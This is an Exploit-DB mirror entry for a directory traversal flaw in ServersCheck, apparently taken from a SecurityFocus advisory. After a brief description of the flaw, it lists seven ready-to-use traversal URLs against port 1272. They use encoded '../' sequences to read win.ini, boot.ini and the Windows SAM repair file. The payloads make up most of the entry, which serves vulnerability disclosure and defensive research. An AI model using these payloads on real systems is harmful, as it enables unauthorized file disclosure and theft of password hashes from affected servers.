exploit-db-mirror/exploits/windows/remote/25755.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
897 B
Text

source: https://www.securityfocus.com/bid/13810/info
ServersCheck is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to disclose arbitrary files on an affected computer in the context of the affected application. This may aid in further attacks against the underlying system.
http://www.example.com:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://www.example.com:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
http://www.example.com:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://www.example.com:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://www.example.com:1272/../../ ../../../../../../../boot.ini
http://www.example.com:1272/../../../../../../../../boot.ini
http://www.example.com:1272/../../../../boot.ini